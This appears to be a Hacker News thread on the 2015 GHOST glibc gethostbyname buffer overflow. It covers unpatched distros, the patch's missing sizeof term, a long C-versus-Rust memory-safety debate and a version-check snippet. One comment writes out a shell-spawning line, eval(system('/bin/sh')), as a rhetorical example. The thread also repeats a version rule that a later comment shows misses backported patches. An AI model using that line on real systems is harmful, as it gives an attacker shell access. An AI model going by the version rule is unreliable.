Yes, it was fixed upstream in glibc, but that doesn't mean the distros actually get the patch into their distribution. In fact, the report states: "Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example."


Correct, if you download the src rpm for the latest version of glibc for RHEL 6.5 and compare it with the fix, you will see it is not patched.


Oh yeah, that was obvious, not sure how I missed it. Thanks.


I spent most of the day tracking down the status of various Linux distros. Blog post forthcoming, but the TL;DR is that you need to patch RedHat.


Glancing over the patch, this appears to be the crucial part:

           size_needed = (sizeof (*host_addr)
    -                    + sizeof (*h_addr_ptrs) + strlen (name) + 1);
    +                    + sizeof (*h_addr_ptrs)
    +                    + sizeof (*h_alias_ptr) + strlen (name) + 1);
Doesn't it seem disappointing that some programmers, for whatever reason, just can't seem to count correctly?


I find it pretty funny how no matter how many times we're shown that unsafe languages blow up on all sorts of code by all sorts of programmers, anyone would still try to defend the language.

FFS in this case they even found the bug and fixed it, but didn't notice how it could be a vulnerability. So even with eyes directly on issues, we (human programmers excluding djb) can't seem to get it right.


> I find it pretty funny how no matter how many times we're shown that unsafe languages blow up on all sorts of code by all sorts of programmers, anyone would still try to defend the language.

Heartbleed, Shellshock, Ghost. OpenSSL implemented their own memory allocator, so you would get the same result in another language. Shellshock was a parsing failure, memory safety had nothing to do with it, still arbitrary code execution. Ghost is very hard to exploit, which is why people didn't notice how it could be. It's like trying to exploit an off by one error.

Bugs in production code are not "safe" regardless of what language you use. What we need are better ways to find bugs before the code is put into production.


Shellshock is somewhat atypical for systems vulns no? Looking at all the CVEs for Microsoft for a couple of years, essentially all critical security exploits are due to their use of C/C++.

Heartbleed would not happen just because of a custom allocator. Eg Rust allows you to do so, but would have prevented that code from compiling.

Basically, using C/C++ means that in addition to all the normal security logic errors like command injection, you've got to worry that an errant copy or overflow hands total execution control to an attacker. It's bizarre to not realise this is a huge language failing and that most of the systems level exploits are purely due to poor languages. Even despite all the crazy codegen and memory janking b modern compilers and OSes do, even with some hardware support, it's still happening.


> Shellshock is somewhat atypical for systems vulns no? Looking at all the CVEs for Microsoft for a couple of years, essentially all critical security exploits are due to their use of C/C++.

You're kind of answering your own question. Most OS bugs are in C because most OS code is in C.

> Heartbleed would not happen just because of a custom allocator. Eg Rust allows you to do so, but would have prevented that code from compiling.

If you get a large buffer and then "allocate" it by returning pointers to pieces of it (or offsets if you don't have pointers), now the compiler/runtime only knows where the end of the buffer is, not where the end of the allocation is supposed to be. You can write dumb code in any language.

> Basically, using C/C++ means that in addition to all the normal security logic errors like command injection, you've got to worry that an errant copy or overflow hands total execution control to an attacker. It's bizarre to not realise this is a huge language failing and that most of the systems level exploits are purely due to poor languages.

The problem with this reasoning is that it's solving the problem in the wrong place. Yes, if you screw up very badly then it's better for the language to blow up the program than let the attacker control it. But you still have to solve the other problem, which is that the attacker can blow up the program or possibly do other things even with "safe" languages because the program is parsing unvalidated input etc. And solving that problem, which needs to happen regardless, causes the first problem to go away.


You're not reading it correctly. Microsoft's critical vulns are nearly all of the class of errors that, say, Rust, solves. Memory safety issues. If Windows was written in, e.g. Rust, all those security issues simply would not have happened. I'm not sure how I can make this more clear.

While you can write dumb code in any language, programmers somehow end up not writing remote code execution from simple copies in other languages. Yet in C, this keeps happening.


> You're not reading it correctly. Microsoft's critical vulns are nearly all of the class of errors that, say, Rust, solves. Memory safety issues. If Windows was written in, e.g. Rust, all those security issues simply would not have happened. I'm not sure how I can make this more clear.

And what I'm saying is that you're solving the problem in the wrong place. I'll take a static analysis tool that will find a buffer overrun at compile time over a runtime that blows up the program in production, every time.

> While you can write dumb code in any language, programmers somehow end up not writing remote code execution from simple copies in other languages. Yet in C, this keeps happening.

Shellshock, eval, SQL injection, people will write dumb code that results in remote code execution using whatever you like.


  > I'll take a static analysis tool that will find a buffer 
  > overrun at compile time over a runtime that blows up the 
  > program in production, every time.
Then you'll love Rust, where the compiler is essentially one ultra-comprehensive static analyzer. :)


Cool, well in all this time, all the C static and dynamic security features are still failing. So today, in the real world, your choices seem to be either fail at runtime or fail and execute arbitrary code.


Reason why people defend unsafe languages:

If you make it idiot-proof, someone will make a better idiot.


Care to point out all the RCEs that exist in the millions of lines of C# and Java out there? Apart from exec/eval I don't recall seeing a single one (I'm sure there's a few where they interop or use unsafe code.)


http://www.cvedetails.com/vulnerability-list/vendor_id-45/pr...

That's 12 just in one of the more popular Java web frameworks.

RCE is possible in any language.


Those appear to be all exec/eval type bugs. Yes, if you do "eval($querystring)" you've got a problem in any language, including C.


There are only 2 really difficult problems in computer science: cache invalidation, naming things, and off-by-one errors.


I have no idea if it would apply here, but many instances where a field is forgotten in a size calculation happen because the field wasn't originally there, and not all of the relevant code got updated when it was added. Beware any code that requires knowledge of all elements of some set, and still compiles if a new element is added and the code isn't updated for it.


It is nice if they can count. However instead of sending them back to kindergarten, it might make sense to find a compiler/language/framework that would make inability to count not result in easy remote exploits.


Without trolling, it is true that string manipulation has been a fertile source of major bugs. I don't really see the benefit of having to manipulate arrays of characters manually instead of a string datatype. An unmanaged language doesn't really gain anything from this, apart from this sort of embarrassment.


So remove the ability to use pointers to directly access memory. Then you're only left with all of the other security vulnerabilities found in every such language.


It would still be an improvement.


Uh, how often do code execution vulnerabilities show up in non-C programs compared to how often they show up in C programs?


All the time: SQLi, XSS, arbitrary file upload, ...


XSS is a totally different level. When's the last time a bunch of networked devices needed patches because of XSS?

And even if these problems were as widespread, eliminating a huge class of errors is a big step up. Nearly every serious vulnerability in Microsoft's code for the past years is from memory unsafeness.

Hell, why bother with malaria or smallpox vaccines, since people just die from something else anyways.


The answer to your question is "all the time", because most new appliances are using more high level languages and xss-prone interfaces. This also ignores all the ones that don't get found/fixed.

Of course we should work to eliminate problems, but you have to consider the bigger picture and whether abandoning the language is worth it. So far the pros outweigh the few unique cons.


The fun part is that when you find a language/framework that (e.g.) deserializes data by running eval(), it's so much easier to write portable exploits. 32 bit, 64 bit, x86, arm, mips, aslr? None of that matters. Literally eval(system("/bin/sh")) and done.


Not really. h_addr_ptrs and h_alias_ptr look very similar, and that style with the random linebreaks is practically begging for this kind of error.

I'm far more disappointed that so many programmers haven't adopted better systems, systems that avoid the possibility of this kind of error entirely.


Unless I've misread the patch, the problem isn't that they counted the sizeof the wrong thing, it's that they forgot one of the things entirely. sizeof() the same thing twice would have been explained by similar names.


> Doesn't it seem disappointing that some programmers, for whatever reason, just can't seem to count correctly?

Yet there seems to exist this belief in the C world, that they can.


Yeah, "I would have written it right."


Counting is the hardest thing in programming.


In case anyone has tons of Docker images and looks for a easy way to list those which include a vulnerable glibc version, here is a handy one-liner: https://5pi.de/2015/01/27/find-ghosts-in-your-docker-images/


FYI I get a certificate error - ERR_CERT_AUTHORITY_INVALID - when trying to access your site over the provided https link. OS X 10.10, Chrome and Safari.


I see a chain error - looks like the intermediate certificate is missing.


The 64-bit version update failed to update the libc6.so.6 link, so my system was still vulnerable after update.

Link fix here: http://killtube.org/showthread.php?2118-GHOST-gethostbyname%...


I'm having trouble updating my Ubuntu Server 12.04.5 LTS server to patch this vulnerability.

http://askubuntu.com/questions/578565/ubuntu-12-04-5-lts-won...



This is embarrassing. We now know that the line "with many eyes, all bugs are shallow" is just wrong. What we do know now is that the open source process does not converge to a no-bugs state.

It's time to start phasing out C/C++. Languages which don't know how big their arrays are have to go. If it can run efficiently in a garbage-collected environment, it should be in Go or some scripting language. If it can't use GC, Rust is almost there. (As I say occasionally, I really hope the Rust guys don't screw up.) C and C++ should not be used for new work.

It has been 1 days since the last buffer overflow vulnerability report.


I wish people would stop tarring C++ with the same brush - this vulnerability is caused by exactly the sort of manual dicking around with memory and buffer sizes that are trivial to avoid and completely unidiomatic in C++ but de rigeur in C. Is it possible to create these sorts of bugs in C++? Of course it is, but that's a far cry from an environment that actively leads you down a dangerous path because it lacks the necessary higher level abstractions.


C++ lacks the necessary higher-level abstractions to write memory-safe code. It is vulnerable to iterator invalidation, use-after-free, dangling references, and so forth. RAII does not provide the necessary guarantees.


Please justify your last statement - RAII is often used with Smart Pointers (now in the standard library).


> What we do know now is that the open source process does not converge to a no-bugs state.

Nobody to be taken serious has ever thought or said this -- it says about as much as "You know, I'm not perfect...".

Go itself (as of 1.3) is still itself coded in C, and I have no idea if/how C and Rust are related... C isn't going away, and tooling (Coverity, valgrind, nice compilers like clang) are our friends, as well as work like OpenBSDs string-handling ammendments, malloc() guards, etc.

I really am sympathetic to the complaints against C, but "Burn it!! It's a witch!" doesn't grab me.


Nobody to be taken serious has ever thought or said this

Linus Torvalds is nobody to be taken seriously?


I don't think Linus ever said it. I'm not sure he even agrees with it. Eric S. Raymond named it after him because of Linux.

That said, Eric S. Raymond didn't say the quoted either. He said that "given enough eyeballs, all bugs are shallow", which is a much less bold claim (imo, at least) than that open source converges towards zero bugs over time.


Well it never meant "there are no bugs in open source code" over any length of time. It just means that if a project has enough eyeballs on it, bugs will be squashed quickly. But how many eyeballs is "enough"? Obviously OpenSSL didn't have enough. Does glibc?


This bug was actually fixed 2 years ago, so I'm not sure this is the best example to make your point.


Do we really know that the open source process doesn't converge? No specification for the length of time toward convergence exists, and you could argue that this case is an example of inching ever closer to no-bugs state


Turns out, open source code is written by humans, same as at Microsoft. I remember, back in the day, it was absolutely pathetic that Microsoft Outlook had a buffer overflow in the subject line that could be tripped simply by receiving an email. Well, oops.


> We now know that the line "with many eyes, all bugs are shallow" is just wrong.

How many eyes have actually looked at this code?


Aside from the fact that this bug was seen by eyes and fixed years ago (long enough ago that there's been a new LTS release with it fixed of several if not most distributions), even if they didn't know it was a security fix, this:

> We now know that the line "with many eyes, all bugs are shallow" is just wrong.

Remains approximately similar to saying, while watching the tide go out, that sea levels aren't rising. Anyone who ever thought it meant they were fixed instantaneously, and who uses the fact they get fixed and found as counter-proof of the sentiment, was wrong. It doesn't make the idea fundamentally wrong.


Garbage collection has a performance hit which may not be desirable. You don't really want your network stack to stall from time to time. And OS wouldn't be usable in any mission critical environment.

Array boundaries checking also has a performance hit but I am coming to think it is a necessary evil.

Dealing with strings as char arrays is just absurd. There isn't a significant performance hit to use some string datatype that reduce the opportunity for bugs.


Array bounds checking can often be optimized out. For constructs such as "for x in foo {}" this is trivial. The more general cases require a compiler which can hoist subscript checks out of loops when possible. The compiler has to be allowed to generate checks which fail early; that is, if the loop is going to subscript out of range at iteration 100 and there's no way to exit the loop early, then one check at loop entry is sufficient. This is hard to express to some optimizers.


> What we do know now is that the open source process does not converge to a no-bugs state.

And with closed source, who knows?!

>C and C++ should not be used for new work.

It's funny how articles on C/C++ seem to shoot to the front page here...


> It's time to start phasing out C/C++

Well, unless you get rid of C/C++ interfaces in all syscalls or Win32 APIs, hell Microsoft tried that with managed code, and utterly failed to deliver.


Then they did .NET and converted everybody to C#.


I hate these "just use another language! All problems solved" kind of posts. Mainly because it's shit logic.


Except, "just use another language! All problems of this huge category solved!" is true in this case. You can't have buffer overflows on a memory-safe language. Sure, this is only true assuming the VM and all the stuff it depends on is formally verified not to have buffer overflows either, which is unlikely to happen. But even so, you get the slightly weaker guarantee: "just use another language! All problems of this huge category won't be your fault!" ;)

Now, it is not always practical to use safe languages for everything (specially low level libraries such as say, libc...), and that 'huge category' of problems is not even remotely close to being all the security problems. But using tools that prioritize not shooting yourself in the foot by default is not bad consideration to make, all other things being similar.


Rust provides memory safety without VM to begin with.

Although I do not like the comparison because it's not factually correct, Rust is like the "safe subset of C++". To write actual safe, modern C++ is very close to writing valid Rust. After learning Rust, I became a better C++ programmer.


As I understand it (and keep in mind I have never used Rust, so I might be completely wrong), Rust does have ways to perform unsafe pointer operations and the standard library includes code that does this, no? So, replace VM with libstd. Even if this is not the case, the compiler could produce code that is not memory safe due to bugs in the compiler itself. Turtles all the way down and all that.

Either way, I am all for reducing the number of places where random pointer juggling happens inside a program, be it by using a VM or forbidding certain language features outside of small system libraries (e.g. by banning "unsafe fn" from your own Rust code or by using a static checker to force you to use only the "safe subset of C++"). That way we just need to get a couple thousand lines of code right to solve this particular class of nastiness forever, instead of the hundreds of millions of LOCs that live above the system abstractions.


There are still a few things that rust provides that C++ doesn't. In particular, I think rust's ability to link different object's lifetimes together (think iterators and containers) without forcing you to treat them as the same object will be one of its most significant contributions to language semantic design.


The things is, it's not necessarily true in this case.

While C was intended to run as close to bare metal as possible, and 99% of current implementations do, that doesn't have to be the case. The C specification describes an abstract machine, and uses abstract concepts, with explicit "as-if" rules saying that implementations may, in many cases, do whatever they want, providing that conforming code runs as if it would on a naive implementation.

So there's no reason at all that, for example, pointers have to be implemented as actual bare addresses in a virtual address space which cannot be bounds checked. It should be perfectly possible to create a new implementation, with a new ABI, which defines pointers as a checked type such that all accesses through a pointer are accurately bounds checked, with a guaranteed "virtual" segfault happening whenever an invalid read or write would have occurred.

Sure, it's not ABI-compatible (by defualt) with current bare-metal C ABIs, and would require shims to work with bare-metal C libraries - but that's no different than Rust and similar other new languages. Sure, it's not quite as fast as bare-metal C implementations due to enforced bounds checking, but it's not going to be slower than Rust and similar which do the same job.

And the advantage would be, we wouldn't need to rewrite all our code. We could just recompile all the existing C code we already have to this new safe ABI, rather than having to rewrite everything from scratch in some new language!

Sure, C isn't the nicest language to use. But we already have plenty of existing code that uses it. Why don't we just write a new compiler back-end and take advantage of all that code in a safe manner?


You can't bounds check a pointer begotten from &arr[i]. It simply doesn't carry enough information. Moreover, there might be existing C programs that rely on out of bounds access (where they know that the out of bounds access falls into safe memory). So there is no way to implement a C virtual machine with bounds-checking semantics that is fully compatible with all existing C code.


Sure you can. If, for (bloated, demonstration-only) example, your opaque managed pointer type is actually this under the hood: struct pointer { void * real_base; size_t size; size_t offset; };

then type * p = &arr[i]

translates to struct pointer p = { arr, sizeof(arr), i * sizeof(arr[0]) }

Any any use of "(p + j)" or "p[j]" can check that (p->offset + j sizeof(p)) is greater than or equal to 0 and less than p->size. (Excuse my confused use of types in the above.)

"there might be existing C programs that rely on out of bounds access (where they know that the out of bounds access falls into safe memory)"

Those programs are completely non-portable. They could break with your next compiler upgrade, let alone moving to a different compiler (clang?) or a different OS (BSD?).

It could happen. Witness the people who complained about their broken programs when memcopy() was sped up by taking advantage of the standard, or those who were surprised when NULL checks started being discarded after a pointer had already been dereferenced.

Even so, if you did have such programs, and were unlucky enough to rely on them, and were unable to fix them to comply with the C language spec, there's no reason you couldn't still compile them for the existing bare-metal ABI. I'm not proposing to ban* the x86-64 ABI. I'm just saying lets create an additional (x86-64-safe?) ABI that we could use to provide a safe execution environment for a subset of our existing code. That subset could range from none of it to all of it, depending on how much you personally valued speed and anti-bloat over safety, how many non-conforming programs you relied upon, and whatever other factors you wanted to take into account.


Dumb question perhaps, but is there a command line command I can run to test before and after that this patch has been applied successfully?


The Qualys link (elsewhere on this page) contains sample code to test if you are vulnerable.

Also, you can check your glibc version with this tiny code:

    #include <stdio.h>
    #include <gnu/libc-version.h>
    int main (void) { puts (gnu_get_libc_version ()); return 0; }
(taken from a forum that I've since closed the page on, sorry for lack of attribution)

<= 2.17 is unsafe, >= 2.18 is safe.

ldd --version might also do the trick.


You can check your libc version by running libc - e.g. `/lib/x86_64-linux-gnu/libc.so.6`


Checking the libc version doesn't really tell you if you've fixed the problem, since most vulnerable distributions will be fixing it by patching their older version of libc, so the version number will remain the same.


Thanks, super helpful!


Does it need a marketing moniker?


gethosedbyname


Do you know the sensitivity pattern of the vulnerability? (IDS/IPS)


Is Gentoo affected?


No, the announcement [1] says the affected versions are:

> In particular, we discovered that it was fixed on May 21, 2013 (between the releases of glibc-2.17 and glibc-2.18)

Gentoo is listing glibc version 2.19-r1 as the latest stable version [2] and is using that per default.

[1] http://www.openwall.com/lists/oss-security/2015/01/27/9

[2] http://packages.gentoo.org/package/sys-libs/glibc


If this was patched in 2013 why is it an issue now?


Because it was "silently" fixed so nobody applied the patch to existing, shipping systems.


From what I can gather, it wasn't originally thought to be a security vulnerability so it was thought to be acceptable to leave it be on older systems. Now somebody has figured out how to exploit it.


Sweeping-under-rug is a common approach. It seems that in this instance, they have followed Linus Torvalds mantra, who once said: "I don't have any reason what-so-ever to think it's a good idea to track security bugs and announce them as something special. I don't think some spectacular security hole should be glorified or cared about as being any more special than a random spectacular crash due to bad locking."


excuse the ignorance but could this effect OSX Macs that have GCC installed or is this strictly limited to what it can effect?


Is this serious? Does this mean if I have an app, Java, PHP or whatever, which eventually calls glibc's gethostbyname gethostbyaddr, my machine is owned? That somebody could just craft a special hostname or ip address to lookup? So all those websites where you enter hostname o IP address to lookup something like whois info or ping other machines, could be owned?


If it affects gethostbyaddr that'd be really bad - there are a lot of applications that automatically look up reverse DNS on a connection.

Mail servers in particular generally make it pretty easy to trigger both forward and reverse lookups.

The test case seems to have it looking up an ip address as if it were a name, but it's using the reentrant version of the function - maybe only those are affected?


> If it affects gethostbyaddr

The release at http://www.frsag.org/pipermail/frsag/2015-January/005722.htm... says that it affects both gethostbyname() and gethostbyaddr().



Ouch. Ouch. Ouch.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: